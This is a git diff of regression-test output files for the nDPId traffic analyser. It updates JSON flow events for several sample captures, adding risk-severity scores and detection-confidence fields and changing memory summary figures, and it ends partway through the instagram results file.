-00660{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":147,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":47,"flow_first_seen":1219992819942,"flow_last_seen":1219993055118,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":417,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1219993055118,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1578,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}}
+00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":104,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1219992819942,"flow_last_seen":1219992819944,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"ts_msec":1219992819944,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1578,"dst_port":2404,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}}
+00686{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":115,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1219992590188,"flow_last_seen":1219992781349,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":4,"midstream":0,"ts_msec":1219992909959,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1572,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}}
+00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":117,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1219992782348,"flow_last_seen":1219992818955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":2,"midstream":0,"ts_msec":1219992935396,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1577,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}}
+00686{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":147,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":47,"flow_first_seen":1219992819942,"flow_last_seen":1219993055118,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":417,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1219993055118,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1578,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}}
 00164{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":147,"source":"iec60780-5-104.pcap","alias":"nDPId-test","total-events-serialized":38}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 147/147
@@ -44,10 +44,10 @@
 ~~ total active/idle flows...: 6/6
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4605092 bytes
-~~ total memory freed........: 4605092 bytes
-~~ total allocations/frees...: 99715/99715
+~~ total memory allocated....: 4688405 bytes
+~~ total memory freed........: 4688405 bytes
+~~ total allocations/frees...: 101305/101305
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 169 chars
-~~ json string max len.......: 665 chars
-~~ json string avg len.......: 487 chars
+~~ json string max len.......: 691 chars
+~~ json string avg len.......: 500 chars
diff --git a/test/results/imap-starttls.pcap.out b/test/results/imap-starttls.pcap.out
index 60f71b1d6..88d0469e3 100644
--- a/test/results/imap-starttls.pcap.out
+++ b/test/results/imap-starttls.pcap.out
@@ -3,8 +3,8 @@
 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"imap-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1437584567812,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1437584567812,"pkt":"kFmvW2bUaKhtGGkOCABFAABAc8pAAEAGDnPAqBE11OMRusHoAI+CJObQAAAAALAC\/\/\/XTwAAAgQFtAEDAwQBAQgKKoxROgAAAAAEAgAA"}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"imap-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1437584568002,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1437584568002,"pkt":"aKhtGGkOkFmvW2bUCABFIAA0AABAADAGkinU4xG6wKgRNQCPwehPqEW7giTm0YASPryvAAAAAgQFtAQCAwMKAAAA"}
 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"imap-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1437584568002,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1437584568002,"pkt":"kFmvW2bUaKhtGGkOCABFAAAohpRAAEAG+8DAqBE11OMRusHoAI+CJObRT6hFvFAQQAD2hgAA"}
-00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"imap-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1437584567812,"flow_last_seen":1437584568383,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":271,"flow_tot_l4_payload_len":524,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1437584568383,"l3_proto":"ip4","src_ip":"192.168.17.53","dst_ip":"212.227.17.186","src_port":49640,"dst_port":143,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"IMAPS","breed":"Safe","category":"Email"}}
-00707{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":32,"source":"imap-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1437584567812,"flow_last_seen":1437584570828,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6193,"flow_avg_l4_payload_len":193,"midstream":0,"ts_msec":1437584570828,"l3_proto":"ip4","src_ip":"192.168.17.53","dst_ip":"212.227.17.186","src_port":49640,"dst_port":143,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"IMAPS","breed":"Safe","category":"Email"}}
+00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"imap-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1437584567812,"flow_last_seen":1437584568383,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":271,"flow_tot_l4_payload_len":524,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1437584568383,"l3_proto":"ip4","src_ip":"192.168.17.53","dst_ip":"212.227.17.186","src_port":49640,"dst_port":143,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"IMAPS","breed":"Safe","category":"Email"}}
+00816{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":32,"source":"imap-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1437584567812,"flow_last_seen":1437584570828,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6193,"flow_avg_l4_payload_len":193,"midstream":0,"ts_msec":1437584570828,"l3_proto":"ip4","src_ip":"192.168.17.53","dst_ip":"212.227.17.186","src_port":49640,"dst_port":143,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"IMAPS","breed":"Safe","category":"Email"}}
 00161{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":32,"source":"imap-starttls.pcap","alias":"nDPId-test","total-events-serialized":8}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 32/32
@@ -14,10 +14,10 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4597805 bytes
-~~ total memory freed........: 4597805 bytes
-~~ total allocations/frees...: 99586/99586
+~~ total memory allocated....: 4682758 bytes
+~~ total memory freed........: 4682758 bytes
+~~ total allocations/frees...: 101176/101176
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 166 chars
-~~ json string max len.......: 712 chars
-~~ json string avg len.......: 496 chars
+~~ json string max len.......: 821 chars
+~~ json string avg len.......: 544 chars
diff --git a/test/results/imap.pcap.out b/test/results/imap.pcap.out
index 8ce38b9ef..d97970473 100644
--- a/test/results/imap.pcap.out
+++ b/test/results/imap.pcap.out
@@ -3,8 +3,8 @@
 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"imap.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1213095262213,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1213095262213,"pkt":"AASWJ8g6ABUXJM1lCABFAAA8nkhAAEAGgSAKKAQCCigDArPdAI+IaqplAAAAAKACFtDwZgAAAgQFtAQCCAoKDDQtAAAAAAEDAwc="}
 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"imap.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1213095262213,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1213095262213,"pkt":"ABUXJM1lAASWJ8g6CABFAAA8VURAAH8GiyQKKAMCCigEAgCPs903+0YNiGqqZqASIAAxdQAAAgQFtAEDAwgEAggKAoc1IAoMNC0="}
 00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"imap.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1213095262213,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1213095262213,"pkt":"AASWJ8g6ABUXJM1lCABFAAA0nklAAEAGgScKKAQCCigDArPdAI+IaqpmN\/tGDoAQAC6AFAAAAQEICgoMNC0ChzUg"}
-00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"imap.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1213095262213,"flow_last_seen":1213095266594,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1213095266594,"l3_proto":"ip4","src_ip":"10.40.4.2","dst_ip":"10.40.3.2","src_port":46045,"dst_port":143,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"IMAP","breed":"Unsafe","category":"Email"},"imap": {"user":"samir","password":"pfres"}}
-00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":33,"source":"imap.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1213095262213,"flow_last_seen":1213095266780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":696,"flow_tot_l4_payload_len":1580,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1213095266780,"l3_proto":"ip4","src_ip":"10.40.4.2","dst_ip":"10.40.3.2","src_port":46045,"dst_port":143,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"IMAP","breed":"Unsafe","category":"Email"}}
+00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"imap.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1213095262213,"flow_last_seen":1213095266594,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1213095266594,"l3_proto":"ip4","src_ip":"10.40.4.2","dst_ip":"10.40.3.2","src_port":46045,"dst_port":143,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"IMAP","breed":"Unsafe","category":"Email"},"imap": {"user":"samir","password":"pfres"}}
+00777{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":33,"source":"imap.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1213095262213,"flow_last_seen":1213095266780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":696,"flow_tot_l4_payload_len":1580,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1213095266780,"l3_proto":"ip4","src_ip":"10.40.4.2","dst_ip":"10.40.3.2","src_port":46045,"dst_port":143,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"IMAP","breed":"Unsafe","category":"Email"}}
 00152{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":33,"source":"imap.pcap","alias":"nDPId-test","total-events-serialized":8}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 33/33
@@ -14,10 +14,10 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4597834 bytes
-~~ total memory freed........: 4597834 bytes
-~~ total allocations/frees...: 99587/99587
+~~ total memory allocated....: 4682787 bytes
+~~ total memory freed........: 4682787 bytes
+~~ total allocations/frees...: 101177/101177
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 157 chars
-~~ json string max len.......: 678 chars
-~~ json string avg len.......: 478 chars
+~~ json string max len.......: 785 chars
+~~ json string avg len.......: 525 chars
diff --git a/test/results/imaps.pcap.out b/test/results/imaps.pcap.out
index 6dd014714..986dc0475 100644
--- a/test/results/imaps.pcap.out
+++ b/test/results/imaps.pcap.out
@@ -3,10 +3,10 @@
 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1590857744659,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1590857744659,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG+f\/AqAEIp2PXpMVKA+HRNM\/NAAAAALAC\/\/\/ajwAAAgQFtAEDAwUBAQgKFE2dOQAAAAAEAgAA"}
 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1590857744706,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1590857744706,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGBgSnY9ekwKgBCAPhxUrMi6La0TTPzqAS\/ojr6QAAAgQFrAQCCAqpw+fsFE2dOQEDAwc="}
 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1590857744706,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1590857744706,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+gvAqAEIp2PXpMVKA+HRNM\/OzIui24AQECwI4wAAAQEIChRNnWGpw+fs"}
-00838{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1590857744659,"flow_last_seen":1590857744710,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1590857744710,"l3_proto":"ip4","src_ip":"192.168.1.8","dst_ip":"167.99.215.164","src_port":50506,"dst_port":993,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mail.ntop.org","ja3":"4923a265be4d81c68ecda45bb89cdf6a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-00895{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1590857744659,"flow_last_seen":1590857744765,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1667,"flow_avg_l4_payload_len":277,"midstream":0,"ts_msec":1590857744765,"l3_proto":"ip4","src_ip":"192.168.1.8","dst_ip":"167.99.215.164","src_port":50506,"dst_port":993,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mail.ntop.org","ja3":"4923a265be4d81c68ecda45bb89cdf6a","ja3s":"b653c251b0ee54c3088fe7bb997cf59d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}}
-01099{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1590857744659,"flow_last_seen":1590857744765,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3107,"flow_avg_l4_payload_len":443,"midstream":0,"ts_msec":1590857744765,"l3_proto":"ip4","src_ip":"192.168.1.8","dst_ip":"167.99.215.164","src_port":50506,"dst_port":993,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mail.ntop.org","server_names":"mail.ntop.org","ja3":"4923a265be4d81c68ecda45bb89cdf6a","ja3s":"b653c251b0ee54c3088fe7bb997cf59d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=mail.ntop.org","fingerprint":"F1:9A:35:30:96:57:5E:56:81:28:2C:D9:45:A5:83:21:9E:E8:C5:DF"}}
-00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1590857744659,"flow_last_seen":1590857744987,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3856,"flow_avg_l4_payload_len":192,"midstream":0,"ts_msec":1590857744987,"l3_proto":"ip4","src_ip":"192.168.1.8","dst_ip":"167.99.215.164","src_port":50506,"dst_port":993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}}
+00944{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1590857744659,"flow_last_seen":1590857744710,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1590857744710,"l3_proto":"ip4","src_ip":"192.168.1.8","dst_ip":"167.99.215.164","src_port":50506,"dst_port":993,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mail.ntop.org","ja3":"4923a265be4d81c68ecda45bb89cdf6a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01001{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1590857744659,"flow_last_seen":1590857744765,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1667,"flow_avg_l4_payload_len":277,"midstream":0,"ts_msec":1590857744765,"l3_proto":"ip4","src_ip":"192.168.1.8","dst_ip":"167.99.215.164","src_port":50506,"dst_port":993,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mail.ntop.org","ja3":"4923a265be4d81c68ecda45bb89cdf6a","ja3s":"b653c251b0ee54c3088fe7bb997cf59d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}}
+01205{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1590857744659,"flow_last_seen":1590857744765,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3107,"flow_avg_l4_payload_len":443,"midstream":0,"ts_msec":1590857744765,"l3_proto":"ip4","src_ip":"192.168.1.8","dst_ip":"167.99.215.164","src_port":50506,"dst_port":993,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mail.ntop.org","server_names":"mail.ntop.org","ja3":"4923a265be4d81c68ecda45bb89cdf6a","ja3s":"b653c251b0ee54c3088fe7bb997cf59d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=mail.ntop.org","fingerprint":"F1:9A:35:30:96:57:5E:56:81:28:2C:D9:45:A5:83:21:9E:E8:C5:DF"}}
+00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1590857744659,"flow_last_seen":1590857744987,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3856,"flow_avg_l4_payload_len":192,"midstream":0,"ts_msec":1590857744987,"l3_proto":"ip4","src_ip":"192.168.1.8","dst_ip":"167.99.215.164","src_port":50506,"dst_port":993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}}
 00154{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":20,"source":"imaps.pcap","alias":"nDPId-test","total-events-serialized":10}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 20/20
@@ -16,10 +16,10 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4600320 bytes
-~~ total memory freed........: 4600320 bytes
-~~ total allocations/frees...: 99578/99578
+~~ total memory allocated....: 4685273 bytes
+~~ total memory freed........: 4685273 bytes
+~~ total allocations/frees...: 101168/101168
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 159 chars
-~~ json string max len.......: 1104 chars
-~~ json string avg len.......: 682 chars
+~~ json string max len.......: 1210 chars
+~~ json string avg len.......: 733 chars
diff --git a/test/results/instagram.pcap.out b/test/results/instagram.pcap.out
index 1195c455f..740b4ead5 100644
--- a/test/results/instagram.pcap.out
+++ b/test/results/instagram.pcap.out
@@ -6,47 +6,49 @@
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"instagram.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1436720898475,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1436720898475,"pkt":"QPMIw47hABsv8H60CABFAAA05iNAAFUGAlAfDV00wKgAZwG7hJCk1JOYiMGTh4AQAE5t9QAAAQEIClpSq0YAA+qL"}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"instagram.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1436720898499,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1436720898499,"pkt":"QPMIw47hABsv8H60CABFAAA8AABAAFIGTqyt\/GsEwKgAZwG73D5XFMWUHoSlo6ASOJBK1AAAAgQFlgQCCAq8TYT0AAPqiAEDAwg="}
